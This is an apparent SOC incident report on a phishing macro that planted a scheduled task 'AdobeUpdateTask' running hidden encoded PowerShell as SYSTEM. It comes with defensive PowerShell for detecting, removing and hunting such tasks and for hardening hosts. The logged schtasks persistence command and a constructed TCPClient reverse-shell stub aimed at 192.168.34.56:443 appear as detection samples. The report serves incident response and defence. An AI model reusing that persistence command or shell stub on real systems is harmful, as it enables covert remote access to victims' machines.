Splunk Alert Details
Alert ID: SPLUNK-SCHEDTASK-1053-7842
Alert Time: 2024-02-14 13:15:33 EST
Severity: HIGH (82/100)
Source: Splunk Enterprise Security
Rule: “Suspicious Scheduled Task Creation”
MITRE ATT&CK: T1053.005 – Scheduled Task/Job: Scheduled Task
Alert Details:
Correlated Events:
1. Windows Event ID 4698 (Scheduled Task Created):
– Time: 13:10 EST
– Host: HR-WS-023
– User: SYSTEM
– Task Name: “AdobeUpdateTask”
– Task Content: (XML task definition not included in the alert excerpt)
2. Event ID 4688 (Process Creation):
– Time: 13:10:15 EST
– Process: schtasks.exe
– Command: schtasks /create /tn "AdobeUpdateTask" /tr "powershell -WindowStyle Hidden -Enc …" /ru SYSTEM /sc ONLOGON
3. File Creation:
– File: C:\Windows\System32\Tasks\AdobeUpdateTask (the registered task XML; schtasks.exe on current Windows writes here, not to the legacy C:\Windows\Tasks\*.job store)
– Time: 13:10:20 EST
Detection Logic:
– Task name mimics a legitimate vendor (Adobe) while the action is powershell.exe, not a vendor binary
– Task runs as SYSTEM and is triggered at every user logon (/ru SYSTEM /sc ONLOGON)
– Action is hidden-window PowerShell with an -EncodedCommand payload, a pattern typical of reverse-shell one-liners
– schtasks.exe was launched from an Office/PowerShell process chain rather than by an installer or updater
Additional Context:
– User on HR-WS-023 (kjones) reported clicking email attachment earlier
– No legitimate Adobe software installed on host
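As an added example (not code from the original Splunk rule or this report), the four Detection Logic indicators above implemented as a PowerShell scoring function over the TaskContent XML that Event ID 4698 carries. The sample task XML and the -Enc payload are constructed here to mirror what the logged schtasks command line would register; the stand-in payload is only the first statement of the common TCPClient one-liner, not the real decoded script. The vendor list, the score threshold and the Program Files check are assumptions for illustration.

```powershell
# Added example, not part of the original Splunk rule: scores a 4698 TaskContent
# XML against the "Detection Logic" indicators. Sample XML and payload below are
# constructed; the real task definition is not reproduced on this page.

function ConvertFrom-EncodedCommand {
    # -EncodedCommand (any prefix such as -Enc or -e works) takes base64 of UTF-16LE text.
    # The length guard keeps "-ExecutionPolicy Bypass" from being mistaken for a payload.
    param([string]$Arguments)
    if ($Arguments -match '-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})(?=\s|$)') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

function Test-SuspiciousScheduledTask {
    param(
        [Parameter(Mandatory)][string]$TaskName,   # 4698 TaskName field
        [Parameter(Mandatory)][xml]$TaskXml        # 4698 TaskContent field
    )
    $reasons = New-Object System.Collections.Generic.List[string]
    $task    = $TaskXml.Task            # PowerShell's XML adapter ignores the default namespace
    $exec    = $task.Actions.Exec

    # 1. Vendor-name masquerade: vendor in the name, action not under that vendor's Program Files.
    if ($TaskName -match 'adobe|google|microsoft|java|oracle' -and
        $exec.Command -notmatch '^"?[A-Z]:\\Program Files') {
        $reasons.Add("Name '$TaskName' impersonates a vendor but action is '$($exec.Command)'")
    }
    # 2. Principal is SYSTEM (well-known SID S-1-5-18 or the account name).
    $runAs = $task.Principals.Principal.UserId
    if ($runAs -match '^(S-1-5-18|(NT AUTHORITY\\)?SYSTEM)$') { $reasons.Add("Runs as SYSTEM ($runAs)") }
    # 3. Encoded PowerShell; flag a socket-opening body as a reverse-shell pattern.
    $decoded = ConvertFrom-EncodedCommand $exec.Arguments
    if ($exec.Command -match 'powershell|pwsh' -and $decoded) {
        $detail = if ($decoded -match 'TCPClient|Net\.Sockets') { 'reverse-shell pattern' } else { 'encoded command' }
        $reasons.Add("PowerShell -Enc payload ($detail): $($decoded.Substring(0, [Math]::Min(60, $decoded.Length)))")
    }
    # 4. Logon trigger: persistence that re-fires at every logon.
    if ($task.Triggers.LogonTrigger) { $reasons.Add('LogonTrigger (persists across logons)') }

    [pscustomobject]@{
        TaskName   = $TaskName
        Score      = $reasons.Count           # number of indicators hit, 0..4
        Suspicious = $reasons.Count -ge 3     # assumed threshold
        Reasons    = $reasons
        Decoded    = $decoded
    }
}

# Constructed sample. The stub is the opening statement of the common TCPClient one-liner;
# the logged prefix JABjAGwAaQBlAG4AdAA also decodes (UTF-16LE) to "$client".
$stub      = '$client = New-Object System.Net.Sockets.TCPClient("192.168.34.56",443)'
$encoded   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stub))
$sampleXml = [xml]@"
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>powershell</Command><Arguments>-WindowStyle Hidden -Enc $encoded</Arguments></Exec></Actions>
</Task>
"@

Test-SuspiciousScheduledTask -TaskName 'AdobeUpdateTask' -TaskXml $sampleXml | Format-List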
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed malicious scheduled task creation |
| 2. Command Decoding | Decode the -Enc payload (base64 of UTF-16LE) | PowerShell, CyberChef | Reverse shell to 192.168.34.56:443 |
| 3. Immediate Containment | Remove task, isolate host | schtasks, CrowdStrike | Task deleted; host isolated |
| 4. User Interview | Contact user | Teams, Phone | User clicked phishing email with Excel macro |
| 5. Malware Analysis | Analyze macro and payload | CrowdStrike Sandbox | Macro dropped and executed schtasks command |
| 6. Threat Hunting | Search for same task on other hosts | Splunk, CrowdStrike | No other occurrences |
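As an added example (not the SOC's actual runbook), steps 3 and 6 of the table above as PowerShell: preserve the task definition, delete the task and verify it is gone, then hunt other hosts for the same task name or for any task whose action is encoded PowerShell. The evidence directory, the use of WinRM (Invoke-Command) for remote hosts and the encoded-command regex are assumptions; run it elevated, since deleting a SYSTEM task and reading System32\Tasks both require administrative rights.

```powershell
# Added example, not the original SOC runbook: containment (step 3) and hunting (step 6).

function Remove-MaliciousScheduledTask {
    param(
        [Parameter(Mandatory)][string]$TaskName,
        [string]$EvidenceDir = "$env:SystemDrive\IR\$env:COMPUTERNAME"   # assumed location
    )
    New-Item -ItemType Directory -Force -Path $EvidenceDir | Out-Null

    # Preserve before touching: exported XML plus the on-disk registration under
    # System32\Tasks (schtasks.exe does not create legacy .job files).
    schtasks /query /tn $TaskName /xml ONE | Out-File "$EvidenceDir\$TaskName.xml"
    Copy-Item "$env:SystemRoot\System32\Tasks\$TaskName" "$EvidenceDir\$TaskName.registered" -ErrorAction SilentlyContinue

    # /end stops a running instance; /delete /f removes the task without a confirmation prompt.
    schtasks /end /tn $TaskName 2>$null | Out-Null
    schtasks /delete /tn $TaskName /f | Out-Null

    # Verify: /query exits non-zero once the task no longer exists.
    schtasks /query /tn $TaskName 2>$null | Out-Null
    return ($LASTEXITCODE -ne 0)
}

# Hunt: same task name, or any task whose action is PowerShell with an encoded command.
$scanBlock = {
    param($Name)
    Get-ScheduledTask | Where-Object {
        $_.TaskName -eq $Name -or
        ($_.Actions | Where-Object {
            $_.Execute -match 'powershell|pwsh' -and $_.Arguments -match '-e[a-z]*\s+[A-Za-z0-9+/]{20,}={0,2}'
        })
    } | ForEach-Object {
        [pscustomobject]@{
            Host   = $env:COMPUTERNAME
            Task   = $_.TaskPath + $_.TaskName
            RunAs  = $_.Principal.UserId
            State  = $_.State
            Action = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ; '
        }
    }
}

function Find-SuspiciousScheduledTasks {
    param([string[]]$ComputerName, [string]$TaskName = 'AdobeUpdateTask')
    if (-not $ComputerName) { return & $scanBlock $TaskName }      # local host only
    Invoke-Command -ComputerName $ComputerName -ScriptBlock $scanBlock -ArgumentList $TaskName
}

# Usage on the affected host, then across a fleet list (hypothetical host names):
# Remove-MaliciousScheduledTask -TaskName 'AdobeUpdateTask'
# Find-SuspiciousScheduledTasks -ComputerName (Get-Content .\hr-hosts.txt) | Format-Table -AutoSize
Find-SuspiciousScheduledTasks | Format-Table -AutoSize
```

The hunt deliberately does not key only on the task name: an attacker re-deploying with a different name would still be caught by the encoded-PowerShell check, while legitimate vendor tasks almost never pass an -EncodedCommand argument.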
Jira Incident Report
Ticket: SOC-2024-072
Summary: T1053 – Malicious Scheduled Task Created for Persistence
Status: RESOLVED
Resolution: MALICIOUS – Persistence Removed
Priority: P2 – MEDIUM
Labels: T1053, scheduled-task, persistence, splunk, phishing
Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security correlation.
Alert: “Suspicious Scheduled Task Creation”.
Host: HR-WS-023 (HR Department, user kjones).
Time: 2024-02-14 13:15 EST.
Technique: MITRE ATT&CK T1053.005 – Scheduled Task/Job: Scheduled Task.
2. Technical Analysis:
Attack Chain:
13:00 – User opens the phishing email attachment (Benefits_Q1.xlsm) and enables macros
13:01 – Excel macro executes
13:02 – Macro launches PowerShell, which downloads and runs the second-stage script
13:10 – PowerShell invokes schtasks.exe; task “AdobeUpdateTask” registered to run as SYSTEM at logon (Event IDs 4698 and 4688)
13:15 – Splunk correlation alert triggers
Scheduled Task Details:
Name: AdobeUpdateTask (masquerading as an Adobe updater; no Adobe software is installed on the host)
Trigger: Logon (/sc ONLOGON; fires at any user's logon)
Run As: SYSTEM (/ru SYSTEM). Registering a SYSTEM task requires administrative rights, and the 4698 Subject was also SYSTEM, so the creating PowerShell process was already elevated
Action: PowerShell, hidden window, -EncodedCommand reverse shell to 192.168.34.56:443
Payload Analysis:
Decoded PowerShell command (base64 of UTF-16LE; the logged prefix JABjAGwAaQBlAG4AdAA decodes to "$client", the opening of the common TCPClient one-liner): TCP reverse shell giving the operator an interactive command session
C2 IP: 192.168.34.56:443 (internal address, later identified as a compromised engineering host)
The shell also attempts to download additional tooling once connected
User Activity:
User received email from “hr@benefits-update[.]net”
Attachment “Benefits_Q1.xlsm”
User enabled macros as the document instructed
3. Investigation Findings:
Timeline:
13:00 – User opens email attachment
13:02 – Macro executes PowerShell
13:10 – Scheduled task created (Event ID 4698)
13:15 – Splunk alert triggers
13:17 – SOC investigation begins
13:20 – Host isolated; task deleted
Indicators of Compromise (IoCs):
Task:
– Name: AdobeUpdateTask
– Command: powershell -WindowStyle Hidden -Enc JABjAGwAaQBlAG4AdAA…
Network:
– C2: 192.168.34.56:443
Email:
– Sender: hr@benefits-update[.]net
– Attachment: Benefits_Q1.xlsm (SHA256: b2c3d4e5f6…)
4. Containment Actions:
Immediate Actions:
Deleted the scheduled task (schtasks /delete /tn AdobeUpdateTask /f).
Isolated host via CrowdStrike.
Blocked traffic to 192.168.34.56:443 at the internal firewall.
Quarantined the email from all mailboxes.
Host Remediation:
Removed macro-generated files.
No reimage performed: the task was the only persistence mechanism found and no C2 connection occurred before it was deleted.
User Remediation:
Password reset.
Phishing awareness training assigned.
5. Root Cause Analysis:
Primary Cause: Phishing email with malicious macro.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
User lacked recent training.
6. Business Impact:
Operational Impact: HR workstation offline for 2 hours.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Task removed.
Host cleaned.
User educated.
Email quarantined.
Technical Controls Enhanced:
Enabled ASR rule “Block all Office applications from creating child processes”.
Blocked macros in files from the internet via GPO (Office policy “Block macros from running in Office files from the Internet”).
Enhanced scheduled task monitoring.
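As an added example (not configuration from the original report), the controls listed above applied and verified on a single host with PowerShell. GPO is the right delivery mechanism at scale; the registry value below is the one the “Block macros from running in Office files from the Internet” policy writes, and the ASR rule GUID is Microsoft's published identifier for the Office child-process rule. The audit subcategory is included because Event ID 4698, which this whole detection depends on, is only logged when “Other Object Access Events” auditing is enabled. The Office app list and the decision to start in Block rather than AuditMode are assumptions.

```powershell
# Added example, not the page's own configuration. Run elevated.

$OfficeChildProcRule = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'  # "Block all Office applications from creating child processes"

function Set-OfficeChildProcessAsr {
    # Roll out in AuditMode first if unsure: Defender logs 1122 (audit) / 1121 (block)
    # in Microsoft-Windows-Windows Defender/Operational for every hit.
    param([ValidateSet('Enabled','AuditMode','Warn','Disabled')][string]$Mode = 'Enabled')
    Add-MpPreference -AttackSurfaceReductionRules_Ids $OfficeChildProcRule -AttackSurfaceReductionRules_Actions $Mode
}

function Test-OfficeChildProcessAsr {
    # Returns $true only when the rule is in Block mode (action codes: 0 Off, 1 Block, 2 Audit, 6 Warn).
    $pref = Get-MpPreference
    $ids  = @($pref.AttackSurfaceReductionRules_Ids)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        if ($ids[$i] -ieq $OfficeChildProcRule) { return ($pref.AttackSurfaceReductionRules_Actions[$i] -eq 1) }
    }
    return $false
}

function Set-InternetMacroBlock {
    # Per-user policy key written by the GPO setting; Office 2016/2019/365 use the 16.0 path.
    param([string[]]$Apps = @('excel','word','powerpoint'))   # assumed app set
    foreach ($app in $Apps) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\security"
        New-Item -Path $key -Force | Out-Null
        Set-ItemProperty -Path $key -Name blockcontentexecutionfrominternet -Value 1 -Type DWord
    }
}

function Test-InternetMacroBlock {
    param([string]$App = 'excel')
    $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$App\security"
    return ((Get-ItemProperty -Path $key -Name blockcontentexecutionfrominternet -ErrorAction SilentlyContinue).blockcontentexecutionfrominternet -eq 1)
}

function Enable-ScheduledTaskAuditing {
    # 4698 (created), 4699 (deleted), 4700/4701 (enabled/disabled) and 4702 (updated)
    # all belong to the "Other Object Access Events" subcategory.
    auditpol /set /subcategory:"Other Object Access Events" /success:enable /failure:enable | Out-Null
    return ($LASTEXITCODE -eq 0)
}

# Apply, then verify each control independently.
Set-OfficeChildProcessAsr -Mode Enabled
Set-InternetMacroBlock
[pscustomobject]@{
    AsrBlockMode     = Test-OfficeChildProcessAsr
    MacroBlockExcel  = Test-InternetMacroBlock -App excel
    TaskAuditEnabled = Enable-ScheduledTaskAuditing
}
```

The ASR rule alone would have stopped this chain at the Excel-to-PowerShell step; the macro policy stops the document from running code at all when it carries the Mark of the Web; the audit setting is what keeps the 4698-based Splunk rule from going silently blind on hosts where the subcategory was never enabled.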
8. Conclusion:
A phishing email with a macro-enabled Excel attachment led to a scheduled task being created for SYSTEM-level persistence. Splunk detected the task creation within five minutes, and the task was deleted before any C2 communication to 192.168.34.56 occurred.
Closure Rationale: Persistence removed; user educated; preventive controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-14 14:30 EST